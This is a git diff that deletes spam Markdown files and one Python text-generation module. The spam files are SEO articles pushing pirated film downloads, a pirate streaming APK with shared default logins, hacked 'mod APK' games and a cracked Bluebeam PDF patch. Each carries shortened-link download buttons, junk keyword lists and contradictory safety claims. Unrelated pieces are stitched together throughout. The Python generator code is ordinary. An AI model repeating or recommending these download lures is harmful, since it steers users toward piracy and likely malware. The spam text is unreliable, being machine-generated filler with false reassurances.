      -Download Kal Ho Naa Ho comedy drama musical film hd
      -Kal Ho Naa Ho Netflix streaming download 720p
      -Kal Ho Naa Ho IMDb rating reviews download hd
      -Kal Ho Naa Ho romantic film by Nikhil Advani download
      -Kal Ho Naa Ho soundtrack songs mp3 download 720p
      -Kal Ho Naa Ho subtitles english hindi download hd
      -Kal Ho Naa Ho Saif Ali Khan Jaya Bachchan movie download
      -Kal Ho Naa Ho box office collection awards download 720p
      -Kal Ho Naa Ho plot summary story download hd
      -Kal Ho Naa Ho trailer video youtube download 720p
      -Kal Ho Naa Ho wikipedia information facts download hd
      -Kal Ho Naa Ho best scenes dialogues download 720p
      -Kal Ho Naa Ho remake sequel rumors download hd
      -Kal Ho Naa Ho behind the scenes making of download 720p
      -Kal Ho Naa Ho cast and crew interviews download hd
      -Kal Ho Naa Ho deleted scenes bloopers download 720p
      -Kal Ho Naa Ho movie poster wallpaper download hd
      -Kal Ho Naa Ho fan art memes gifs download 720p
      -Kal Ho Naa Ho fan fiction stories reviews download hd
      -Kal Ho Naa Ho quotes lyrics captions download 720p
      -Kal Ho Naa Ho analysis themes messages download hd
      -DownloadKalHoNaaHoHD1080pfullmovieinhindi
      -DownloadKalHoNaaHoHD4Kfullmovieinhindi
      -DownloadKalHoNaaHoHDblurayfullmovieinhindi
      -DownloadKalHoNaaHoHDdvdripfullmovieinhindi
      -DownloadKalHoNaaHoHDmkvfullmovieinhindi
      -DownloadKalHoNaaHoHDmp4fullmovieinhindi
      -DownloadKalHoNaaHoHDavi fullmovieinhindi
      -DownloadKalHoNaaHotorrentmagnetlinkfullmovieinhindi
      -DownloadKalHoNaaHodirectlinkfullmovieinhindi
      -DownloadKalHoNaaHofromNetflixAmazonPrimeHotstarfullmovieinhindi
      -DownloadKalHoNaaHofromIMDbWikipediaRottenTomatoesfullmovieinhindi
      -DownloadKalHoNaaHofromYashRajFilmsDharmaProductionsfullmovieinhindi
      -DownloadKalHoNaaHofromShankarEhsaanLoyKaranJoharfullmovieinhindi
      -DownloadKalHoNaaHofromShahRukhKhanSaifAliKhanPreityZinta fullmovieinhindi
      -DownloadKalHoNaaHofromJayaBachchanSushmaSethReemaLagoo fullmovieinhindi
      -HowtodownloadKalHoNaaHohd720pfullmovieinhindi
      -WheretodownloadKalHoNaaHohd720pfullmovieinhindi
      -WhentodownloadKalHoNaaHohd720pfullmovieinhindi
      -WhytodownloadKalHoNaaHohd720pfullmovieinhindi
      -WhattoexpectfromdownloadKalHoNaaHohd720pfullmovieinhindi

      -

      Kal Ho Naa Ho is a must-watch film for anyone who loves romance, comedy and drama. It is one of the best films of Shah Rukh Khan, Preity Zinta and Saif Ali Khan, and it will leave you with a smile on your face and a tear in your eye. So, don't miss this opportunity to download Kal Ho Naa Ho HD 720p full movie in Hindi from Hotstar and enjoy this masterpiece at your convenience.

      -```

      e753bf7129
      -
      -
      \ No newline at end of file diff --git a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Cmo descargar e instalar Home Play Apk con el usuario y contrasea correctos.md b/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Cmo descargar e instalar Home Play Apk con el usuario y contrasea correctos.md deleted file mode 100644 index 57a3e1fc1e41750e8f917e7e085ccc2059282f74..0000000000000000000000000000000000000000 --- a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Cmo descargar e instalar Home Play Apk con el usuario y contrasea correctos.md +++ /dev/null @@ -1,116 +0,0 @@ -
      -

      Home Play APK: How to Watch Free Movies and TV Shows on Your Android Device

      -

      Do you love watching movies and TV shows on your Android device? Do you want to access thousands of titles for free without any hassle? If yes, then you should try Home Play APK. Home Play APK is an amazing app that lets you stream movies and TV shows from various sources on your Android device. You can watch anything from Hollywood blockbusters to indie films, from popular TV series to documentaries, from anime to cartoons, and more. All you need is a username and password to access this app.

      -

      home play apk usuario y contraseña


      DOWNLOAD →→→ https://bltlly.com/2uOic4



      -

      What is Home Play APK?

      -

      Home Play APK is an app that allows you to watch movies and TV shows online for free on your Android device. It is not available on the Google Play Store, so you have to download it from a third-party website. Home Play APK is not affiliated with any official streaming service or provider, so it does not host any content on its own servers. Instead, it scrapes links from various sources on the internet and provides them to you in one place. You can choose from different categories, genres, languages, countries, years, ratings, etc., or search for your favorite title using keywords.

      -

      Features of Home Play APK

      -

      Home Play APK has many features that make it one of the best apps for streaming movies and TV shows on your Android device. Here are some of them:

      -

      Large library of content

      -

      Home Play APK has a huge collection of movies and TV shows from various sources. You can find anything from the latest releases to the classics, from action to comedy, from drama to horror, and more. You can also watch TV shows from different networks, channels, and countries. You can binge-watch your favorite series or catch up with the latest episodes. Home Play APK updates its content regularly, so you can always find something new to watch.

      -

      High-quality streaming

      -

      Home Play APK offers high-quality streaming for movies and TV shows. You can choose from different resolutions, such as 360p, 480p, 720p, or 1080p, depending on your internet speed and device compatibility. You can also adjust the brightness, volume, and playback speed of the video. Home Play APK supports multiple video players, such as MX Player, VLC Player, or the default player of your device. You can also cast the video to your TV using Chromecast or other devices.

      -

      User-friendly interface

      -

      Home Play APK has a user-friendly interface that makes it easy to navigate and use. You can browse through different categories, genres, languages, countries, years, ratings, etc., or search for your favorite title using keywords. You can also filter the results by popularity, date added, or alphabetically. You can also mark the movies and TV shows that you like as favorites, so you can access them quickly later. You can also see the details of each movie and TV show, such as the synopsis, cast, director, genre, rating, etc.

      -

      No registration or subscription required

      -

      Home Play APK does not require you to register or subscribe to use its services. You can watch movies and TV shows for free without any limitations or restrictions. You do not have to provide any personal information or payment details to access this app. You also do not have to worry about annoying ads or pop-ups that might interrupt your streaming experience.

      -

      How to Download and Install Home Play APK?

      -

      If you want to download and install Home Play APK on your Android device, you have to follow these simple steps:

      -

      Step 1: Enable unknown sources on your device

      -

      Since Home Play APK is not available on the Google Play Store, you have to enable unknown sources on your device to install it. To do this, go to Settings > Security > Unknown Sources and toggle it on. This will allow you to install apps from third-party websites.

      -

      home play apk login and password
      -how to install home play apk on android
      -home play apk account and password free
      -home play apk download latest version
      -home play apk user and pass 2023
      -best home play apk alternatives for streaming
      -home play apk premium account and password
      -home play apk mod apk unlocked
      -home play apk review and features
      -home play apk error usuario o contraseña incorrectos
      -home play apk firestick installation guide
      -home play apk contraseña y usuario actualizados
      -home play apk for pc windows 10
      -home play apk activation code and password
      -home play apk vs dark play green apk
      -home play apk smart tv compatible devices
      -home play apk contraseña y usuario gratis 2023
      -home play apk update and changelog
      -home play apk support and contact information
      -home play apk for ios iphone and ipad
      -home play apk contraseña y usuario premium
      -how to fix home play apk not working
      -home play apk for mac os x
      -home play apk contraseña y usuario ilimitados
      -home play apk vs totalplay modem
      -home play apk roku setup tutorial
      -home play apk contraseña y usuario vip
      -how to uninstall home play apk from android
      -home play apk for linux ubuntu and mint
      -home play apk contraseña y usuario sin publicidad

      -

      Step 2: Download the APK file from a trusted source

      -

      Next, you have to download the APK file of Home Play APK from a trusted source. You can use this link to download the latest version of Home Play APK. Make sure you have enough storage space on your device before downloading the file.

      -

      Step 3: Locate and install the APK file on your device

      -

      After downloading the APK file, you have to locate it on your device using a file manager app. Once you find it, tap on it and follow the instructions on the screen to install it. It might take a few seconds for the installation process to complete.

      -

      Step 4: Launch Home Play APK and enjoy

      -

      Finally, you can launch Home Play APK from your app drawer or home screen and start watching movies and TV shows for free. You will be asked to enter a username and password to access this app. You can use the default credentials or request a new account from the developer.

      -

      How to Use Home Play APK?

      -

      Using Home Play APK is very easy and simple. Here are some tips on how to use this app:

      -

      Choose a category or search for a title

      -

      You can choose from different categories, genres, languages, countries, years, ratings, etc., or search for your favorite title using keywords. You can also filter the results by popularity, date added, or alphabetically.

      -

      Select a video and choose a player

      -

      You can select a video that you want to watch and choose a player that you prefer. You can use MX Player, VLC Player, or the default player of your device. You can also cast the video to your TV using Chromecast or other devices.

      -

      Adjust the settings and enjoy your streaming

      -

      You can adjust the settings of the video according to your preferences. You can change the resolution, brightness, volume, and playback speed of the video. You can also enable subtitles, if available, or download them from external sources. You can also pause, resume, rewind, or fast-forward the video as you wish. Enjoy your streaming experience with Home Play APK.

      -

      How to Get a Username and Password for Home Play APK?

      -

      One of the things that you need to use Home Play APK is a username and password. This is because Home Play APK is a private app that requires authentication to access its content. You might be wondering why you need a username and password and how to get them. Here are some answers:

      -

      Why do you need a username and password?

      -

      You need a username and password to use Home Play APK because this app is not an official streaming service or provider. It does not host any content on its own servers, but scrapes links from various sources on the internet. This means that Home Play APK might violate some copyright laws or regulations in some countries or regions. Therefore, Home Play APK uses a username and password system to protect itself and its users from any legal issues or risks.

      -

      How to get a username and password?

      -

      There are two ways to get a username and password for Home Play APK. You can either use the default credentials or request a new account from the developer. Here are the details:

      -

      Option 1: Use the default credentials

      -

      The easiest way to get a username and password for Home Play APK is to use the default credentials that are provided by the developer. The default credentials are:

      - - - - - - - - - -
      UsernamePassword
      homeplayhomeplay
      -

      You can use these credentials to log in to Home Play APK and access its content. However, these credentials might not work sometimes, because they are shared by many users and might be changed or blocked by the developer. Therefore, you might need to use another option to get a username and password.

      -

      Option 2: Request a new account from the developer

      -

      The other way to get a username and password for Home Play APK is to request a new account from the developer. The developer of Home Play APK is very active and responsive on social media platforms, such as Facebook, Twitter, Instagram, etc. You can follow him or her on these platforms and send him or her a message asking for a new account. You can also join his or her groups or channels where he or she posts updates and news about Home Play APK. You can find the links to his or her social media accounts on the official website of Home Play APK.

      -

      When you request a new account from the developer, you have to provide some information, such as your name, email address, country, etc. The developer will then create a new account for you and send you the username and password via email or message. You can use these credentials to log in to Home Play APK and enjoy its content.

      -

      Conclusion

      -

      Home Play APK is an amazing app that lets you watch movies and TV shows for free on your Android device. You can access thousands of titles from various sources and stream them in high quality. You can also enjoy a user-friendly interface and no registration or subscription required. All you need is a username and password to use this app.

      -

      If you want to download and install Home Play APK on your Android device, you have to follow some simple steps. You have to enable unknown sources on your device, download the APK file from a trusted source, locate and install the APK file on your device, and launch Home Play APK and enjoy.

      -

      If you want to get a username and password for Home Play APK, you have two options. You can either use the default credentials or request a new account from the developer. You can contact the developer on social media platforms or join his or her groups or channels.

      -

      We hope this article has helped you learn more about Home Play APK and how to use it. If you have any questions or feedback, please feel free to leave them in the comments section below.

      -

      Frequently Asked Questions

      -

      Here are some frequently asked questions about Home Play APK:

      -

      Q: Is Home Play APK safe to use?

      -

      A: Home Play APK is safe to use as long as you download it from a trusted source and scan it with an antivirus app before installing it. Home Play APK does not contain any malware or virus that might harm your device or data. However, you should be careful about the content that you stream from Home Play APK, as some of it might be illegal or pirated in your country or region. You should always respect the rights of the content creators and owners and use Home Play APK for personal and non-commercial purposes only.

      -

      Q: Is Home Play APK legal to use?

      -

      A: Home Play APK is not an official streaming service or provider, so it does not have any license or authorization to distribute or host any content on its own servers. Home Play APK only scrapes links from various sources on the internet and provides them to you in one place. Therefore, the legality of Home Play APK depends on the laws and regulations of your country or region and the sources that you stream from. Some of the content that you stream from Home Play APK might be legal and free to watch, while some of it might be illegal or pirated and subject to copyright infringement or other legal issues. You should always check the legality of the content that you stream from Home Play APK before watching it and use a VPN or proxy service to protect your identity and privacy.

      -

      Q: How can I update Home Play APK?

      -

      A: Home Play APK updates its app regularly to fix bugs, improve performance, and add new features and content. You can update Home Play APK by following these steps:

      -
        -
      • Go to the official website of Home Play APK and download the latest version of the APK file.
      • -
      • Uninstall the previous version of Home Play APK from your device.
      • -
      • Install the new version of Home Play APK on your device using the same steps as before.
      • -
      • Launch Home Play APK and enjoy the updated app.
      • -
      -

      Q: How can I contact the developer of Home Play APK?

      -

      A: You can contact the developer of Home Play APK by following him or her on social media platforms, such as Facebook, Twitter, Instagram, etc. You can also join his or her groups or channels where he or she posts updates and news about Home Play APK. You can find the links to his or her social media accounts on the official website of Home Play APK. You can also send him or her a message or email using the contact form on the website.

      -

      Q: What are some alternatives to Home Play APK?

      -

      A: If you are looking for some alternatives to Home Play APK, you can try these apps:

      -
        -
      • Cinema HD: Cinema HD is a popular app that lets you watch movies and TV shows for free on your Android device. It has a large library of content from various sources and genres. It also has a user-friendly interface and high-quality streaming.
      • -
      • Typhoon TV: Typhoon TV is another app that allows you to watch movies and TV shows for free on your Android device. It has a huge collection of content from different categories and languages. It also has a simple interface and multiple video players.
      • -
      • CyberFlix TV: CyberFlix TV is an app that enables you to watch movies and TV shows for free on your Android device. It has a massive database of content from various sources and regions. It also has a sleek interface and fast streaming.
      • -

      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Download Knife Hit Mod APK for Android - Free Shopping and No Ads.md b/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Download Knife Hit Mod APK for Android - Free Shopping and No Ads.md deleted file mode 100644 index 816f58887a19005466f1604d598d9c02a63ff38f..0000000000000000000000000000000000000000 --- a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Download Knife Hit Mod APK for Android - Free Shopping and No Ads.md +++ /dev/null @@ -1,120 +0,0 @@ -
      -

      Download Mod APK Knife Hit: A Fun and Addictive Game of Knife Throwing

      -

      Do you love playing casual games that test your reflexes and skills? Do you enjoy throwing knives at rotating targets and avoiding obstacles? If you answered yes, then you might want to try Knife Hit, a popular game developed by Ketchapp. In this article, we will tell you everything you need to know about Knife Hit, including what it is, what are its features, and how to download its mod apk version. We will also give you some alternatives to mod apk knife hit in case you want to try other games or websites. So, let's get started!

      -

      download mod apk knife hit


      Download File » https://bltlly.com/2uOjTa



      -

      What is Knife Hit?

      -

      Knife Hit is a simple yet challenging game that requires you to throw knives at rotating targets without hitting any other knives or obstacles. The game has hundreds of levels with different themes, such as fruits, animals, zombies, pirates, and more. Each level has a boss that you need to defeat by hitting it with a certain number of knives. The game also has various knives that you can collect and use, each with its own design and effect.

      -

      The gameplay of Knife Hit

      -

      The gameplay of Knife Hit is easy to learn but hard to master. You just need to tap on the screen to throw a knife at the target. However, you need to time your taps carefully, as the target rotates at different speeds and directions. You also need to avoid hitting any other knives or obstacles that are already on the target. If you hit them, you will lose a life and have to start over. You have three lives in each level, so be careful!

      -

      The features of Knife Hit

      -

      Knife Hit has many features that make it fun and addictive. Some of them are:

      -
        -
      • Multiple levels with different themes and difficulties
      • -
      • Various knives with unique designs and effects
      • -
      • Boss fights that challenge your skills and reflexes
      • -
      • Leaderboards and achievements that track your progress and performance
      • -
      • Daily challenges and rewards that give you extra coins and knives
      • -
      • Simple graphics and sound effects that create a relaxing atmosphere
      • -
      -

      What is Mod APK Knife Hit?

      -

      Mod APK Knife Hit is a modified version of the original APK of the game on Google Play. With this version, players can enjoy exclusive hack features to easily and quickly overcome levels and missions. In addition, the mod apk version is optimized for file size, allowing players to install and experience the game smoothly on any Android device.

      -

      The benefits of Mod APK Knife Hit

      -

      Some of the benefits of Mod APK Knife Hit are:

      -

      download knife hit mod apk unlimited money
      -knife hit mod apk download latest version
      -download knife hit mod apk android 1
      -knife hit mod apk free download for android
      -download knife hit mod apk no ads
      -knife hit mod apk download apkpure
      -download knife hit mod apk all knives unlocked
      -knife hit mod apk download rexdl
      -download knife hit mod apk revdl
      -knife hit mod apk download hack
      -download knife hit mod apk unlimited apples
      -knife hit mod apk free shopping download
      -download knife hit mod apk boss unlocked
      -knife hit mod apk download 2023
      -download knife hit mod apk 1.8.19
      -knife hit mod apk download for pc
      -download knife hit mod apk offline
      -knife hit mod apk online play download
      -download knife hit mod apk unlimited everything
      -knife hit mod apk premium download
      -download knife hit mod apk vip unlocked
      -knife hit mod apk full version download
      -download knife hit mod apk with unlimited gems
      -knife hit mod apk no root download
      -download knife hit mod apk latest update
      -knife hit mod apk easy download
      -download knife hit mod apk mega mod
      -knife hit mod apk direct download link
      -download knife hit mod apk new version
      -knife hit mod apk fast download
      -download knife hit mod apk pro version
      -knife hit mod apk safe download
      -download knife hit mod apk without verification
      -knife hit mod apk original download
      -download knife hit mod apk with obb file
      -knife hit mod apk high damage download
      -download knife hit mod apk unlocked levels
      -knife hit mod apk low mb download
      -download knife hit mod apk god mode
      -knife hit mod apk best version download

      -
        -
      • Unlimited money: You can get unlimited coins in the game, which you can use to buy new knives or unlock new levels.
      • -
      • Free shopping: You can buy anything in the game without spending any money or watching any ads.
      • -
      • No ads: You can play the game without being interrupted by annoying ads.
      • -
      • All unlocked: You can access all the levels, themes, knives, and features in the game without having to complete any quests or achievements.
      • -
      -

      The risks of Mod APK Knife Hit

      -

      However, there are also some risks of Mod APK Knife Hit that you should be aware of:

      -
        -
      • Potential - Potential malware: You may download a mod apk file that contains viruses or malware that can harm your device or steal your personal information. - Potential ban: You may get banned from the game or from Google Play if you use a mod apk version that violates the terms and conditions of the game or the platform. - Potential loss of data: You may lose your progress or data in the game if you switch from the original apk to the mod apk or vice versa. - Potential boredom: You may lose interest in the game if you use a mod apk version that makes the game too easy or too boring.
      -

      How to download Mod APK Knife Hit?

      -

      If you want to download Mod APK Knife Hit, you need to follow these steps:

      -

      Step 1: Go to the APKVIPO website

      -

      The APKVIPO website is one of the best sources for mod apk files of various games and apps. You can visit their website at (https://apkvi.com/). Once you are on their homepage, you can search for Knife Hit in the search bar or browse through their categories.

      -

      Step 2: Choose the Mod APK version or the original APK version

      -

      Once you find Knife Hit on the APKVIPO website, you will see two options: Mod APK and Original APK. The Mod APK option will give you access to the hack features mentioned above, while the Original APK option will give you the same version as on Google Play. You can choose whichever option you prefer, depending on your needs and preferences.

      -

      Step 3: Click on the download button and wait for the file to be downloaded

      -

      After you choose your option, you will see a download button below it. Click on it and wait for a few seconds until a new window pops up. Then, click on the "Download Now" button and wait for the file to be downloaded to your device. The file size is about 60 MB, so make sure you have enough space and a stable internet connection.

      -

      Step 4: Click on the downloaded file and follow the instructions to install the game

      -

      Once the file is downloaded, you can click on it and follow the instructions to install the game. You may need to enable unknown sources in your device settings to allow the installation of third-party apps. After the installation is complete, you can open the game and enjoy it with or without mod features. -

      Alternatives to Mod APK Knife Hit

      -

      If you are looking for alternatives to Mod APK Knife Hit, you have two options: other knife throwing games on Google Play or other mod apk websites that offer Knife Hit.

      -

      Other knife throwing games on Google Play

      -

      If you want to try other knife throwing games on Google Play, here are some of them:

      -
        -
      • Flippy Knife: A game that lets you flip knives, axes, swords, and other weapons in different modes and environments.(https://play.google.com/store/apps/details?id=com.BeresnevGames.Knife&hl=en_US&gl=US)
      • -
      • Knife Bounty: A game that challenges you to throw knives at fruits, coins, balloons, and other targets while avoiding bombs and obstacles.(https://play.google.com/store/apps/details?id=com.knife.bounty&hl=en_US&gl=US)
      • -
      • Knife Dash: A game that tests your reflexes and accuracy by throwing knives at spinning boards with different patterns and shapes.(https://play.google.com/store/apps/details?id=com.knife.dash.hit&hl=en_US&gl=US)
      • -
      -

      Other mod apk websites that offer Knife Hit

      -

      If you want to try other mod apk websites that offer Knife Hit, here are some of them:

      -
        -
      • Happymod: A website that provides thousands of mod apk files for various games and apps, including Knife Hit.(https://www.happymod.com/knife-hit-mod/com.ketchapp.knifehit/)
      • -
      • Moddroid: A website that offers high-quality mod apk files for popular games and apps, including Knife Hit.(https://moddroid.com/knife-hit.html)
      • -
      • Aptoide: A website that allows users to download and share mod apk files for various games and apps, including Knife Hit.(https://knife-hit.en.aptoide.com/app)
      • -
      -

      Conclusion

      -

      In conclusion, Knife Hit is a fun and addictive game of knife throwing that you can download from Google Play or from mod apk websites. With mod apk versions, you can enjoy hack features that make the game easier and more enjoyable. However, you should also be aware of the risks of using mod apk files, such as malware, ban, data loss, or boredom. If you want to try other knife throwing games or other mod apk websites, you can check out the alternatives we suggested. We hope this article helped you learn more about Knife Hit and how to download its mod apk version. Have fun playing the game and throwing knives!

      FAQs

      -

      Here are some frequently asked questions about Knife Hit and its mod apk version:

      -

      Q: Is Knife Hit free to play?

      -

      A: Yes, Knife Hit is free to play on Google Play. However, it contains in-app purchases and ads that may affect your gaming experience.

      -

      Q: Is Mod APK Knife Hit safe to use?

      -

      A: Mod APK Knife Hit is not officially endorsed by the game developer or Google Play. Therefore, it may contain malware or viruses that can harm your device or personal information. You should only download mod apk files from trusted sources and scan them with antivirus software before installing them.

      -

      Q: Can I play Mod APK Knife Hit online with other players?

      -

      A: No, Mod APK Knife Hit is not compatible with online multiplayer mode. You can only play it offline on your device.

      -

      Q: How can I update Mod APK Knife Hit to the latest version?

      -

      A: You cannot update Mod APK Knife Hit from Google Play or the game itself. You need to download the latest mod apk file from the website where you got it and install it over the old one.

      -

      Q: What are some tips and tricks for playing Knife Hit?

      -

      A: Some tips and tricks for playing Knife Hit are:

      -
        -
      • Watch the target carefully and observe its rotation speed and direction.
      • -
      • Tap on the screen when there is a gap between the knives or obstacles on the target.
      • -
      • Collect as many coins and apples as possible to buy new knives or unlock new levels.
      • -
      • Use different knives for different situations. Some knives have special effects, such as splitting, bouncing, or exploding.
      • -
      • Don't rush or panic. Take your time and aim carefully.
      • -

      197e85843d
      -
      -
      \ No newline at end of file diff --git a/spaces/tinkoff-ai/caif/generator.py b/spaces/tinkoff-ai/caif/generator.py deleted file mode 100644 index 377fa0f93956cbb9e628f38639f6a68689a34e3e..0000000000000000000000000000000000000000 --- a/spaces/tinkoff-ai/caif/generator.py +++ /dev/null @@ -1,266 +0,0 @@ -from typing import Optional, Union - -import torch -import transformers -import streamlit as st - -from plotly import graph_objects as go - -from utils import get_lm - - -class Generator: - def __init__(self, lm_model_name, device, entropy=None): - - self.device = device - - self.tokenizer = transformers.AutoTokenizer.from_pretrained( - lm_model_name - ) - self.lm = get_lm(lm_model_name).to(device) - self.lm.eval() - - self.lm.config.pad_token_id = self.lm.config.eos_token_id - self.tokenizer.add_special_tokens( - {"pad_token": self.tokenizer.decode(self.lm.config.eos_token_id)} - ) - self.caif_sampler = None - self.ordinary_sampler = None - self.entropy_based_stats = { - "skips": 0, - "avg_entropy": 0, - "count": 0, - } - self.entropy = entropy - - def set_caif_sampler(self, sampler): - self.caif_sampler = sampler - - def set_ordinary_sampler(self, sampler): - self.ordinary_sampler = sampler - - def sample_sequences( - self, - num_samples: int, - input_prompt: Optional[str], - max_length: int, - caif_period: int, - caif_tokens_num: Union[int, None] = None, - entropy: float = None, - progress_bar=None, - **sampler_kwargs - ): - self.entropy = entropy - - input_ids, past, ended_sequences = self.get_input_ids( - input_prompt, - num_samples, - ) - text = st.empty() - plot = st.empty() - gen_history = [] - layout = go.Layout({ - "xaxis": { - "title": "# Tokens" - }, - "yaxis": { - "title": "Desired Attribute" - }, - "plot_bgcolor": '#FFFFFF', - "template": "plotly_white", - "hovermode": "x", - - }) - inp_len = len(input_ids[0]) - if self.caif_sampler is not None: - current_decoded = self.tokenizer.decode(input_ids[0]) - probs = torch.exp( - self.caif_sampler.get_classifier_log_probs( - current_decoded, target_cls_id=sampler_kwargs["target_cls_id"] - ) - ).item() - gen_history += [probs] - for i in range(max_length): - is_caif_step = ( - i % caif_period == 0 and self.caif_sampler is not None - ) - input_ids, past, ended_sequences = self.generation_step( - input_ids, - past, - ended_sequences, - is_caif_step, - caif_tokens_num=caif_tokens_num, - **sampler_kwargs - ) - progress_bar.progress((i+1)/max_length) - if ended_sequences.all(): - break - current_decoded = self.tokenizer.decode(input_ids[0]) - if self.caif_sampler is not None: - probs = torch.exp( - self.caif_sampler.get_classifier_log_probs( - current_decoded, target_cls_id=sampler_kwargs["target_cls_id"] - ) - ).item() - gen_history += [probs] - scatter_data = go.Scatter({ - "x": list(range(len(gen_history))), - "y": gen_history, - "hovertext": ["[PROMPT]"] + [self.tokenizer.decode(t) for t in input_ids[0][inp_len:]] - }) - fig = go.Figure([scatter_data], layout=layout) - plot.plotly_chart(fig, use_container_width=True) - if i == 0: - with st.expander("What is it?"): - st.write("You can see how the probability of the desired attribute varies for every generation step.") - text.text(current_decoded) - - return ( - [ - self.tokenizer.decode(sequence, skip_special_tokens=True) - for sequence in input_ids - ], - input_ids, - ) - - def generation_step( - self, - input_ids, - past, - ended_sequences, - is_caif_step: bool, - caif_tokens_num=None, - **sampler_kwargs - ): - prepared_inputs = self.lm.prepare_inputs_for_generation( - input_ids, past, use_cache=True - ) - outputs = self.lm( - **prepared_inputs, - output_attentions=False, - output_hidden_states=False, - return_dict=True - ) - - past = outputs.past_key_values - if self.entropy is not None: - normalized = torch.nn.functional.log_softmax( - outputs.logits, dim=-1 - ) - p = torch.exp(normalized) - output_probs = p - output_information = -normalized - output_entropy = (output_probs * output_information).sum(-1)[:, -1] - batch_size = output_entropy.shape[0] - caif_mask = torch.ge(output_entropy, self.entropy) - ordinary_mask = ~caif_mask - self.entropy_based_stats["skips"] += caif_mask.sum() / batch_size - self.entropy_based_stats["count"] += 1 - self.entropy_based_stats["avg_entropy"] += ( - output_entropy.sum() / batch_size - ) - flatten_entropy = output_entropy.view(-1).cpu().tolist() - if "entropy" not in self.entropy_based_stats.keys(): - self.entropy_based_stats["entropy"] = flatten_entropy - else: - self.entropy_based_stats["entropy"] += flatten_entropy - - if caif_mask.sum() == 0: - next_tokens_sampler = self.ordinary_sampler - next_tokens = next_tokens_sampler( - input_ids, - outputs.logits, - caif_tokens_num=caif_tokens_num, - **sampler_kwargs - ) - next_tokens = ( - next_tokens * (1 - ended_sequences.long()) - + self.lm.config.eos_token_id * ended_sequences.long() - ).long() - - elif caif_mask.sum() == batch_size: - next_tokens_sampler = self.caif_sampler - next_tokens = next_tokens_sampler( - input_ids, - outputs.logits, - caif_tokens_num=caif_tokens_num, - **sampler_kwargs - ) - next_tokens = ( - next_tokens * (1 - ended_sequences.long()) - + self.lm.config.eos_token_id * ended_sequences.long() - ).long() - - else: - next_tokens_caif = self.caif_sampler( - input_ids[caif_mask], - outputs.logits[caif_mask], - caif_tokens_num=caif_tokens_num, - **sampler_kwargs - ) - next_tokens_ordinary = self.ordinary_sampler( - input_ids[ordinary_mask], - outputs.logits[ordinary_mask], - caif_tokens_num=caif_tokens_num, - **sampler_kwargs - ) - next_tokens_caif = ( - next_tokens_caif * (1 - ended_sequences[caif_mask].long()) - + self.lm.config.eos_token_id - * ended_sequences[caif_mask].long() - ).long() - next_tokens_ordinary = ( - next_tokens_ordinary - * (1 - ended_sequences[ordinary_mask].long()) - + self.lm.config.eos_token_id - * ended_sequences[ordinary_mask].long() - ).long() - - next_tokens = torch.ones(batch_size).long().to(self.device) - next_tokens[caif_mask] = next_tokens_caif - next_tokens[ordinary_mask] = next_tokens_ordinary - else: - if is_caif_step: - next_tokens_sampler = self.caif_sampler - else: - next_tokens_sampler = self.ordinary_sampler - - next_tokens = next_tokens_sampler( - input_ids, - outputs.logits, - caif_tokens_num=caif_tokens_num, - **sampler_kwargs - ) - - next_tokens = ( - next_tokens * (1 - ended_sequences.long()) - + self.lm.config.eos_token_id * ended_sequences.long() - ).long() - - input_ids = torch.cat( - [input_ids, next_tokens[:, None].to(self.device)], dim=-1 - ) - - ended_sequences += next_tokens == self.lm.config.eos_token_id - - return input_ids, past, ended_sequences - - def get_input_ids(self, input_prompt, num_samples): - #input_ids = torch.tensor([[self.lm.config.bos_token_id]]) - if input_prompt is not None: - input_prompt = self.tokenizer( - input_prompt, return_tensors="pt" - ).input_ids - input_ids = input_prompt - input_ids = input_ids.repeat(num_samples, 1).to(self.device) - past = None - ended_sequences = torch.zeros( - input_ids.shape[0], device=self.device - ).bool() - - return input_ids, past, ended_sequences - - @staticmethod - def sample(unscaled_probs, values): - samples = torch.multinomial(unscaled_probs, 1) - return torch.take_along_dim(values, samples, dim=1) diff --git a/spaces/tioseFevbu/cartoon-converter/scripts/((INSTALL)) BluebeamPDFRevueXtreme1250PatchMPT64bit.md b/spaces/tioseFevbu/cartoon-converter/scripts/((INSTALL)) BluebeamPDFRevueXtreme1250PatchMPT64bit.md deleted file mode 100644 index 9a26d2dd29fd8e05f0833c604a9fe8d1ee937b66..0000000000000000000000000000000000000000 --- a/spaces/tioseFevbu/cartoon-converter/scripts/((INSTALL)) BluebeamPDFRevueXtreme1250PatchMPT64bit.md +++ /dev/null @@ -1,279 +0,0 @@ -
      -

      How to Install Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit

      -

      If you are looking for a powerful and versatile software to create, edit, and collaborate on PDF files, you might want to try Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit. This is a patched version of the original software that allows you to use all the features and functions without any limitations or restrictions.

      -

      ((INSTALL)) BluebeamPDFRevueXtreme1250PatchMPT64bit


      Download Filehttps://urlcod.com/2uHySD



      -

      In this article, we will show you what Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit is, how to download it, how to install it, how to use it, and how to troubleshoot common issues with it.

      -

      What is Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit?

      -

      Bluebeam PDF Revu Xtreme is a software that lets you create, edit, annotate, and share PDF files with ease and efficiency. It is designed for professionals in various fields, such as architecture, engineering, construction, design, and more.

      -

      Bluebeam PDF Revu Xtreme has many features and benefits that make it stand out from other PDF software, such as:

      -

      Features and benefits of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit

      -
        -
      • It allows you to create high-quality PDF files from any source, such as Microsoft Office documents, CAD drawings, images, scans, and more.
      • -
      • It lets you edit and modify PDF files with tools such as text editing, cropping, resizing, rotating, merging, splitting, watermarking, redacting, and more.
      • -
      • It enables you to annotate and mark up PDF files with tools such as stamps, highlights, comments, shapes, measurements, hyperlinks, bookmarks, and more.
      • -
      • It supports various file formats for importing and exporting data, such as DWG, DWF, DXF, TIFF, JPEG, PNG, BMP, GIF, DOCX, XLSX, PPTX, HTML, XML, CSV, and more.
      • -
